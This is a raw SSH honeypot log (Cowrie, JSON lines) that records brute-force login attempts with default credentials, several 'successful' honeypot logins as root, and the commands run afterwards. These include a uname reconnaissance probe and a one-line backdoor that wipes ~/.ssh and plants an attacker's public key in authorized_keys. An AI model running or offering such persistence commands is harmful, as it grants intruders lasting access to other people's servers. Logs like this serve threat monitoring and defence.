{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:40:25.992077Z","src_ip":"217.154.1.158","session":"c303d3d440c3"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-26T19:40:26.037707Z","src_ip":"217.154.1.158","session":"c303d3d440c3"}
{"eventid":"cowrie.session.closed","duration":12.709425449371338,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:26.088945Z","src_ip":"113.229.80.250","session":"99305649aea6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:27.054073Z","src_ip":"217.154.1.158","session":"c303d3d440c3"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56774,"dst_ip":"1.2.3.4","dst_port":22,"session":"306e23a7e074","protocol":"ssh","message":"New connection: 217.154.1.158:56774 (1.2.3.4:22) [session: 306e23a7e074]","sensor":"my-vps","timestamp":"2025-08-26T19:40:43.510031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:40:43.510968Z","src_ip":"217.154.1.158","session":"306e23a7e074"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:40:43.525449Z","src_ip":"217.154.1.158","session":"306e23a7e074"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-26T19:40:43.571342Z","src_ip":"217.154.1.158","session":"306e23a7e074"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:44.587552Z","src_ip":"217.154.1.158","session":"306e23a7e074"}
{"eventid":"cowrie.session.connect","src_ip":"187.212.19.0","src_port":42244,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e862ca0c87b","protocol":"ssh","message":"New connection: 187.212.19.0:42244 (1.2.3.4:22) [session: 6e862ca0c87b]","sensor":"my-vps","timestamp":"2025-08-26T19:40:49.840688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:40:49.841763Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:40:50.204952Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.login.success","username":"root","password":"test@12345","message":"login attempt [root/test@12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:40:51.011805Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:40:51.455194Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:40:51.455858Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:40:51.456725Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:51.649299Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:40:52.093260Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:40:52.093959Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:40:52.287363Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:40:52.288356Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.session.connect","src_ip":"187.212.19.0","src_port":45008,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd32ff7c20e4","protocol":"ssh","message":"New connection: 187.212.19.0:45008 (1.2.3.4:22) [session: cd32ff7c20e4]","sensor":"my-vps","timestamp":"2025-08-26T19:40:56.268105Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":42244,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e34a1a4c93d","protocol":"ssh","message":"New connection: 217.154.1.158:42244 (1.2.3.4:22) [session: 0e34a1a4c93d]","sensor":"my-vps","timestamp":"2025-08-26T19:41:00.993550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:41:00.995170Z","src_ip":"217.154.1.158","session":"0e34a1a4c93d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:41:01.012652Z","src_ip":"217.154.1.158","session":"0e34a1a4c93d"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:41:01.058138Z","src_ip":"217.154.1.158","session":"0e34a1a4c93d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:41:01.111759Z","src_ip":"217.154.1.158","session":"0e34a1a4c93d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:41:01.112727Z","src_ip":"217.154.1.158","session":"0e34a1a4c93d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:41:01.128178Z","src_ip":"217.154.1.158","session":"0e34a1a4c93d"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:41:01.129392Z","src_ip":"217.154.1.158","session":"0e34a1a4c93d"}
{"eventid":"cowrie.session.connect","src_ip":"187.212.19.0","src_port":52576,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc5871f7b23f","protocol":"ssh","message":"New connection: 187.212.19.0:52576 (1.2.3.4:22) [session: fc5871f7b23f]","sensor":"my-vps","timestamp":"2025-08-26T19:41:02.034869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:41:02.036514Z","src_ip":"187.212.19.0","session":"fc5871f7b23f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:41:03.772967Z","src_ip":"187.212.19.0","session":"fc5871f7b23f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:41:05.659683Z","src_ip":"187.212.19.0","session":"fc5871f7b23f"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:41:05.850976Z","src_ip":"187.212.19.0","session":"fc5871f7b23f"}
{"eventid":"cowrie.session.closed","duration":"16.2","message":"Connection lost after 16.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:41:06.041758Z","src_ip":"187.212.19.0","session":"6e862ca0c87b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34914,"dst_ip":"1.2.3.4","dst_port":22,"session":"20f77343d121","protocol":"ssh","message":"New connection: 212.227.235.229:34914 (1.2.3.4:22) [session: 20f77343d121]","sensor":"my-vps","timestamp":"2025-08-26T19:41:06.472024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:41:06.473010Z","src_ip":"212.227.235.229","session":"20f77343d121"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T19:41:06.558751Z","src_ip":"212.227.235.229","session":"20f77343d121"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"77:8e:fb:40:6e:28:5f:4f:7c:e1:af:0d:b6:de:0c:73","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJYZIsncBTFc+iCRHXkeGfFA67j+kUVf7h/IL+sh0RXJn7yDN0vEXz7ig73hC//2/71sND+x+Wu0zytQhZxrCPzimSyC8FJCRtcqDATSjvWsIoI4j/AJyKk5k3fCzjPex3moc48TEYiSbAgXYVQ62uNhx7ylug50nTcUH1BNKDiknXjnZfueiqAO1vcgNLH4qfqIj7WWXu8YgFJ9qwYmwbMm+S7jYYgCtD107bpSR7/WoXSr1/SJLGX6Hg1sTet2USiNevGbfqNzciNxOp08hHQIYp2W9sMuo02pXj9nEoiximR4gSKrNoVesqNZMcVA0Kku01uOuOBAOReN7KJQBt","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 77:8e:fb:40:6e:28:5f:4f:7c:e1:af:0d:b6:de:0c:73","sensor":"my-vps","timestamp":"2025-08-26T19:41:06.732477Z","src_ip":"212.227.235.229","session":"20f77343d121"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"77:8e:fb:40:6e:28:5f:4f:7c:e1:af:0d:b6:de:0c:73","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJYZIsncBTFc+iCRHXkeGfFA67j+kUVf7h/IL+sh0RXJn7yDN0vEXz7ig73hC//2/71sND+x+Wu0zytQhZxrCPzimSyC8FJCRtcqDATSjvWsIoI4j/AJyKk5k3fCzjPex3moc48TEYiSbAgXYVQ62uNhx7ylug50nTcUH1BNKDiknXjnZfueiqAO1vcgNLH4qfqIj7WWXu8YgFJ9qwYmwbMm+S7jYYgCtD107bpSR7/WoXSr1/SJLGX6Hg1sTet2USiNevGbfqNzciNxOp08hHQIYp2W9sMuo02pXj9nEoiximR4gSKrNoVesqNZMcVA0Kku01uOuOBAOReN7KJQBt","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T19:41:06.733099Z","src_ip":"212.227.235.229","session":"20f77343d121"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"77:8e:fb:40:6e:28:5f:4f:7c:e1:af:0d:b6:de:0c:73","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJYZIsncBTFc+iCRHXkeGfFA67j+kUVf7h/IL+sh0RXJn7yDN0vEXz7ig73hC//2/71sND+x+Wu0zytQhZxrCPzimSyC8FJCRtcqDATSjvWsIoI4j/AJyKk5k3fCzjPex3moc48TEYiSbAgXYVQ62uNhx7ylug50nTcUH1BNKDiknXjnZfueiqAO1vcgNLH4qfqIj7WWXu8YgFJ9qwYmwbMm+S7jYYgCtD107bpSR7/WoXSr1/SJLGX6Hg1sTet2USiNevGbfqNzciNxOp08hHQIYp2W9sMuo02pXj9nEoiximR4gSKrNoVesqNZMcVA0Kku01uOuOBAOReN7KJQBt","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 77:8e:fb:40:6e:28:5f:4f:7c:e1:af:0d:b6:de:0c:73","sensor":"my-vps","timestamp":"2025-08-26T19:41:06.820907Z","src_ip":"212.227.235.229","session":"20f77343d121"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"77:8e:fb:40:6e:28:5f:4f:7c:e1:af:0d:b6:de:0c:73","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJYZIsncBTFc+iCRHXkeGfFA67j+kUVf7h/IL+sh0RXJn7yDN0vEXz7ig73hC//2/71sND+x+Wu0zytQhZxrCPzimSyC8FJCRtcqDATSjvWsIoI4j/AJyKk5k3fCzjPex3moc48TEYiSbAgXYVQ62uNhx7ylug50nTcUH1BNKDiknXjnZfueiqAO1vcgNLH4qfqIj7WWXu8YgFJ9qwYmwbMm+S7jYYgCtD107bpSR7/WoXSr1/SJLGX6Hg1sTet2USiNevGbfqNzciNxOp08hHQIYp2W9sMuo02pXj9nEoiximR4gSKrNoVesqNZMcVA0Kku01uOuOBAOReN7KJQBt","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T19:41:06.821532Z","src_ip":"212.227.235.229","session":"20f77343d121"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:41:09.888176Z","src_ip":"187.212.19.0","session":"cd32ff7c20e4"}
{"eventid":"cowrie.session.closed","duration":"13.6","message":"Connection lost after 13.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:41:09.889344Z","src_ip":"187.212.19.0","session":"cd32ff7c20e4"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":42074,"dst_ip":"1.2.3.4","dst_port":22,"session":"58be7c4e1237","protocol":"ssh","message":"New connection: 199.195.248.191:42074 (1.2.3.4:22) [session: 58be7c4e1237]","sensor":"my-vps","timestamp":"2025-08-26T19:41:15.472200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:41:15.475982Z","src_ip":"199.195.248.191","session":"58be7c4e1237"}
